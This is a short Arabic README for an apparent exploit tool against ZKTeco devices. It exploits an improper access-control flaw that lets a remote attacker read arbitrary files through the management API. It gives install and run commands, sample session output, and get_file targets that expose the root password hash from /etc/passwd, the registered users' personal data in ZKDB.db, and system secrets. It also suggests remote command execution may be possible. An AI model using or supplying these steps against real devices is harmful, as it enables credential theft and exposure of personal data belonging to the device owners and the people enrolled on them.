التحكم غير الصحيح في الوصول في ZKTECO يسمح للمهاجمين عن بُعد بقراءة أي ملف عبر واجهة برمجة التطبيقات الإدارية.
تثبيت الوحدات المطلوبة
داخل الدليل ZKTEco:
$ pip install -r ./pyzatt/requirements_dev.txt
تشغيل الاستغلال
داخل الدليل ZKTEco:
$ python exploit.py <ip_address>
Connected to 10.0.2.25
(Cmd) get_file <file_name>
أمثلة:
get_file /etc/passwd: كشف تجزئة كلمة مرور الجذر
get_file /mnt/mtdblock/data/ZKDB.db: كشف المعلومات الشخصية للمستخدمين المسجلين. لقراءة المحتويات، قد تحتاج إلى تشغيل هذا الأمر بشكل تسلسلي عدة مرات حتى يتم كشف المحتويات بالكامل
get_file /mnt/mtdblock/data/ZKSystem.db: كشف معلومات حساسة متعلقة بالنظام
قد تكون الأجهزة عرضة بشكل محتمل لتنفيذ الأوامر عن بُعد أيضًا من خلال استخدام واجهة برمجة التطبيقات الإدارية. يمكن أن يكون الاستغلال المذكور في قسم الإسناد مكانًا جيدًا للعثور على اختبار له.